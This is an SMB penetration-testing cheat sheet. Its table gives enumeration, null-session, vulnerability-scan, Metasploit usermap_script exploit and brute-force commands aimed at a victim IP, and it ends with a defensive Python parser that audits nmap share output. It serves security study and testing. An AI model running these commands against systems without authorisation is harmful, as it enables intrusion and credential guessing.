SMB Enumeration and Vulnerability Tools

This document provides information on tools and techniques for enumerating and exploiting SMB services on port 139/445. It lists Linux and Windows tools like nmblookup, enum4linux, nmap scripts, smbclient, rpcclient, and Metasploit modules that can be used to gather information like hostnames, shares, and versions. It also describes how to check for null sessions and common vulnerabilities using tools like smbmap, enum, and Nmap SMB scripts.
SMB - 139/445

| Categories | OS | Tool | Intent | Command | Comments |
|---|---|---|---|---|---|
| 139/445 - smb | Linux | nmblookup | Enumerate hostname | `nmblookup -A <victim_ip>` | |
| 139/445 - smb | Linux | enum4linux | Enumerate hostname | `enum4linux -n <victim_ip>` | Samba versions 2.2.x are a red flag |
| 139/445 - smb | Linux / Windows | nmap | Quick enumeration | `nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>` | |
| 139/445 - smb | Linux | smbver script | Get version | `[Link] <victim_ip>` | Script used to get the SMB version if nmap fails |
| 139/445 - smb | Linux | Metasploit | Get version | `msfconsole; use scanner/smb/smb_version` | Metasploit module to get the SMB version |
| 139/445 - smb | Linux | ngrep | Get version | `ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'` | Manual method to get the version if all else fails |
| 139/445 - smb | Linux / Windows | Wireshark | Get version | #1: run Wireshark; #2: `smbmap -H <victim_ip>` or `smbclient -L \\\\<victim_ip>`; #3: follow the TCP stream of the SMB negotiation | Noted by 1kwstassak in [Link] |
| 139/445 - smb | Linux | smbmap | Get shares | `smbmap -H <victim_ip> -R <sharename>` | Recursively display the files in a specific share |
| 139/445 - smb | Linux | smbclient | Get shares | `echo exit \| smbclient -L \\\\$ip` | |
| 139/445 - smb | Linux | smbclient | Get shares | `smbclient \\\\<victim_ip>\\<share>` | More details in the cherrytree file (1. information gathering > Active > Enumeration > Services > [Link]) |
| 139/445 - smb | Linux | smbclient | Get shares | `smbclient -L //<victim_ip> -N` | `-N` forces the tool not to ask for a password |
| 139/445 - smb | Linux / Windows | nmap | Get shares | `nmap --script smb-enum-shares -p139,445 -T4 -Pn <victim_ip>` | |
| 139/445 - smb | Linux | smbclient | Get shares | `smbclient -L \\\\<victim_ip>\\` | More details in the cherrytree file (1. information gathering > Active > Enumeration > Services > [Link]) |
| 139/445 - smb | Linux | smbmap | Check null sessions | `smbmap -H <victim_ip>` | Vulnerable versions: Windows NT, 2000 and XP (most SMB1) - VULNERABLE, null sessions can be created by default. Windows 2003 and XP SP2 onwards - NOT VULNERABLE, null sessions can't be created by default. Most Samba (Unix) servers. |
| 139/445 - smb | Linux | rpcclient | Check null sessions | `rpcclient -U "" -N $ip` | |
| 139/445 - smb | Linux | smbclient | Check null sessions | `smbclient //<victim_ip>/IPC$ -N` | Success drops you at the `smb: \>` prompt |
| 139/445 - smb | Linux | enum | Exploit null sessions | `enum -s <victim_ip>` | `-s` enumerates the shares of a machine |
| 139/445 - smb | Linux | enum | Exploit null sessions | `enum -U <victim_ip>` | `-U` enumerates users |
| 139/445 - smb | Linux | enum | Exploit null sessions | `enum -P <victim_ip>` | `-P` checks the password policy |
| 139/445 - smb | Linux | enum4linux | Exploit null sessions | `enum4linux -a <victim_ip>` | `-a` uses all enumeration switches (users/shares/password policies) |
| 139/445 - smb | Linux | [Link] | Exploit null sessions | `./[Link] <victim_ip>` | Using /usr/share/doc/python3-impacket/examples/[Link] |
| 139/445 - smb | Linux | smbclient | Connect to shares with a username | `smbclient //$ip/share -U username` | This step requires that you have a credential |
| 139/445 - smb | Linux | smbclient | Connect to a share anonymously | `smbclient \\\\<victim_ip>\\<share>` | More details in the cherrytree file (1. information gathering > Active > Enumeration > Services > [Link]). Example: `smbclient \\\\<victim_ip>\\IPC$` |
| 139/445 - smb | Linux | smbclient | Connect to a share anonymously | `smbclient //<victim_ip>/<share>` | |
| 139/445 - smb | Linux | smbclient | Connect to a share anonymously | `smbclient //<victim_ip>/<share\ name>` or `smbclient //<victim_ip>/"share name"` | If the share name contains a space (e.g. "My Shares") |
| 139/445 - smb | Linux | rpcclient | Connect to a share anonymously | `rpcclient -U " " <victim_ip>` | Connect to the null share, which is the IPC$ share, then enumerate with specific commands; refer to OneNote |
| 139/445 - smb | Linux | rpcclient | Connect to a share anonymously | `rpcclient -U " " -N <victim_ip>` | Connect to the null share, which is the IPC$ share, then enumerate with specific commands; refer to OneNote |
| 139/445 - smb | Linux / Windows | nmap | Check vuln | `nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>` | |
| 139/445 - smb | Linux / Windows | Metasploit | Check common security concerns | `msf> resource smb_checks.rc` or `msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_checks.rc` | This resource script checks common security concerns on SMB for Windows. Specifically, it checks for: MS08-067; MS17-010; SMB version 1 |
| 139/445 - smb | Linux / Windows | Metasploit | Extra validation | `msf> resource smb_validate.rc` or `msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_validate.rc` | Run after the previous check |
| 139/445 - smb | Linux / Windows | Metasploit | Multi exploits | `msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run` | |
| 139/445 - smb | Linux | nmap/medusa | Brute force login | `medusa -h <victim_ip> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/[Link] -M smbnt`; `nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-[Link] <victim_ip> -vvvv`; `nmap --script smb-brute <victim_ip>` | After enumerating users you can brute force the login |
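The `nmap --script smb-enum-shares` and "Check null sessions" rows above produce output that an administrator auditing their own hosts still has to read by hand. As an added example that is not part of this cheat sheet, the following Python parses a constructed sample modelled on the smb-enum-shares script's output, lists every share with its anonymous-access level, and treats anonymous READ on IPC$ as the null-session condition the smbmap/rpcclient/smbclient rows test for. The sample text, the assumption about the exact output layout, and the function names are mine; check the parser against a real scan before relying on it.

```python
"""Audit nmap smb-enum-shares output for shares that grant anonymous access.

Constructed example, not part of the original cheat sheet. The layout of the
sample below is an assumption about nmap's smb-enum-shares output format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample, modelled on `nmap --script smb-enum-shares` output.
# 192.0.2.10 is a documentation address, not a real host.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-enum-shares:
|   account_used: <blank>
|   \\\\192.0.2.10\\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\\\192.0.2.10\\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ
|   \\\\192.0.2.10\\Public:
|     Type: STYPE_DISKTREE
|     Comment: Shared documents
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

# A share header line looks like "\\host\share:" once the "|" prefix is gone.
SHARE_HEADER = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^:]+):$")


@dataclass
class Share:
    host: str
    name: str
    attrs: dict = field(default_factory=dict)

    @property
    def unc(self) -> str:
        return f"\\\\{self.host}\\{self.name}"

    @property
    def anonymous_access(self) -> str:
        # nmap prints "<none>" when the anonymous session got no access.
        return self.attrs.get("Anonymous access", "<none>")


def parse_smb_enum_shares(text: str) -> list[Share]:
    """Turn the script's indented key/value listing into Share objects."""
    shares: list[Share] = []
    current: Share | None = None
    for raw in text.splitlines():
        # Strip nmap's "|", "|_" and indentation prefix.
        line = raw.lstrip("|_ ").rstrip()
        if not line:
            continue
        m = SHARE_HEADER.match(line)
        if m:
            current = Share(m["host"], m["share"])
            shares.append(current)
            continue
        if current is not None and ": " in line:
            key, _, value = line.partition(": ")
            current.attrs[key.strip()] = value.strip()
    return shares


def anonymous_shares(shares: list[Share]) -> dict[str, str]:
    """Map UNC path -> access level for shares reachable without credentials."""
    return {s.unc: s.anonymous_access for s in shares
            if s.anonymous_access.upper() != "<NONE>"}


def null_session_possible(shares: list[Share]) -> bool:
    """Anonymous access to IPC$ is exactly what a null session gives an attacker."""
    return any(s.name.upper() == "IPC$" and s.anonymous_access.upper() != "<NONE>"
               for s in shares)


def audit(text: str) -> dict[str, str]:
    """Parse scan output and return only the shares that need attention."""
    return anonymous_shares(parse_smb_enum_shares(text))


if __name__ == "__main__":
    parsed = parse_smb_enum_shares(SAMPLE_NMAP_OUTPUT)
    for unc, access in audit(SAMPLE_NMAP_OUTPUT).items():
        print(f"anonymous {access:<10} {unc}")
    if null_session_possible(parsed):
        print("null session possible: IPC$ accepts anonymous connections")
```

Feed it the saved output of the nmap command from the table (`nmap -oN scan.txt ...`) for each host you are responsible for; any share other than `<none>` in the anonymous column, and IPC$ in particular, is a finding to close on the server side rather than something to wait for a scanner to report.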
